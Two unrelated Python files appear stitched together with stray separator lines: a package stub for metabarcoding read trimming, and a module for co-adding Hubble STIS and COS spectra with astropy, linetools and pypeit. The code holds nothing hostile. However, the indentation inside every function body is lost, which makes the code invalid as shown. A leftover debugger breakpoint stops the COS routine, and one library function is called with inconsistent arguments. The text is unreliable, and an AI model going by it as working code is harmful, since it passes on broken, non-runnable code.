# -*- coding: utf-8 -*-
"""Package to support metabarcoding read trimmming, merging, and quantitation."""
import os
__version__ = "0.1.0-alpha"
_ROOT = os.path.abspath(os.path.dirname(__file__))
ADAPTER_PATH = os.path.join(_ROOT, "data", "TruSeq3-PE.fa")
|
python
|
import numpy as np
import pylab as pl
from astropy.io import fits
from astropy.table import Table
from linetools.spectra.io import readspec
from linetools.spectra.xspectrum1d import XSpectrum1D
from linetools.spectra.utils import collate
from pypeit.core import coadd as arco
from astropy import units as u
"""Main module for co-addition of 1-d spectra"""
def coadd_stis_from_x1dfiles_old(filenames, wv_array=None, rebin=None, debug=False):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
    # estimate weights for coaddition (PYPIT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
def coadd_stis_from_x1dfiles(filenames, wv_array=None, rebin=None, debug=True):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
    # estimate weights for coaddition (PYPIT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs,None, weights)
# spec1d = arco.coadd_spectra(specs, wave_grid_method='velocity', scale_method='auto')
return spec1d
def load_single_x1d_stis(filename, debug=False):
"""
Parameters
----------
filename : str
Filename of the fits x1d STIS file
        Can be multi-extension
Returns
-------
spec_list : list of XSpectrum1D objects, one for each echelle order
of the single STIS x1d file
"""
# get number of extensions
head = fits.getheader(filename, ext=0)
numext = head['NEXTEND']
spec_list = [] # store XSpectrum1D here.
for ext in range(1, numext + 1):
sp = fits.getdata(filename, ext=ext)
print("Loading echelle orders from file {}, ext={}".format(filename, ext))
for ii in range(len(sp.SPORDER)):
# chop pixels at edges of orders (i.e. poor sensitivity)
nchop_blue = 5
nchop_red = 50
fl = sp.FLUX[ii][nchop_blue:-nchop_red]
er = sp.ERROR[ii][nchop_blue:-nchop_red]
wv = sp.WAVELENGTH[ii][nchop_blue:-nchop_red]
spec = XSpectrum1D.from_tuple((wv,fl,er))
spec_list += [spec]
if debug:
pl.plot(sp.WAVELENGTH[ii], sp.FLUX[ii], drawstyle='steps-mid')
pl.plot(sp.WAVELENGTH[ii], sp.ERROR[ii], ":")
return spec_list
def coadd_cos_from_x1dfiles(filenames, wv_array=None, A_pix=0.01*u.AA):
spec_list = []
#TODO: mask out x1d spectral regions with bad values.
for filename in filenames:
sp = readspec(filename)
import pdb; pdb.set_trace()
# mask =
spec_list += [sp]
# spec_list contains all individual spectra
specs = collate(spec_list) # now all in a single XSpectrum1D object
#rebin
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
A_pix = A_pix.to("AA").value
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='pixel', A_pix=A_pix)
else:
cat_wave = wv_array.to('AA').value
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
    # estimate weights for coaddition (PYPIT)
sn2, weights = arco.sn_weight(specs)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
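# Hypothetical usage sketch (filenames are placeholders, not from this module;
# the FITS writer is the linetools XSpectrum1D method, assumed available):
#   spec = coadd_stis_from_x1dfiles(["obs1_x1d.fits", "obs2_x1d.fits"], rebin=2)
#   spec.write_to_fits("stis_coadd.fits")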
|
python
|